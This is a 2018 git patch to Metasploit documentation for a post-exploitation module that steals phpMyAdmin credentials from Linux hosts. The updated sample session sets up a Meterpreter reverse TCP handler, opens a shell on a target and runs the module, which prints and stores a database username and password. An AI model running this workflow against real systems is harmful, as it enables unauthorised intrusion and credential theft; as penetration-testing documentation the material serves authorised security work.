From 50df5e386acf5f00e329e588a5fba0b94af31ff5 Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Thu, 6 Sep 2018 12:11:14 -0500
Subject: [PATCH] modified doc to reflect new output

---
 .../post/linux/gather/phpmyadmin_credsteal.md | 53 +++++++++----------
 1 file changed, 25 insertions(+), 28 deletions(-)

diff --git a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
index e848c15634..a123835c71 100644
--- a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
+++ b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
@@ -15,36 +15,33 @@ This post module gathers PhpMyAdmin Creds from target Linux machine.
 ## Scenarios
 
 ```
-msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 127.0.0.1
-[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46066) at 2018-08-18 14:46:52 -0400
+msf5 post(linux/gather/phpmyadmin_credsteal) > use multi/handler
+msf5 exploit(multi/handler) > set lhost 192.168.37.1
+lhost => 192.168.37.1
+msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/handler) > run
 
-msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
-msf post(linux/gather/phpmyadmin_credsteal) > set SESSION 1
-SESSION => 1
-msf post(linux/gather/phpmyadmin_credsteal) > exploit
+[*] Started reverse TCP handler on 192.168.37.1:4444 
+[*] Sending stage (816260 bytes) to 192.168.37.226
+[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.226:34880) at 2018-09-06 08:49:52 -0500
+
+meterpreter > background
+[*] Backgrounding session 2...
+msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal 
+msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2
+session => 2
+msf5 post(linux/gather/phpmyadmin_credsteal) > run
+
+
+PhpMyAdmin Creds Stealer!
 
 [+] PhpMyAdmin config found!
-[+] Extracting config file!
-
-<?php
-##
-## database access settings in php format
-## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
-## by /usr/sbin/dbconfig-generate-include
-##
-## by default this file is managed via ucf, so you shouldn't have to
-## worry about manual changes being silently discarded.  *however*,
-## you'll probably also want to edit the configuration file mentioned
-## above too.
-##
-$dbuser='phpmyadmin';
-$dbpass='Passw0rd';
-$basepath='';
-$dbname='phpmyadmin';
-$dbserver='localhost';
-$dbport='3306';
-$dbtype='mysql';
-
+[+] Extracting creds
+[+] User: admin
+[+] Password: acoolpassword
+[*] Storing credentials...
 [*] Post module execution completed
-msf post(linux/gather/phpmyadmin_credsteal) >
+msf5 post(linux/gather/phpmyadmin_credsteal) > 
+
 ```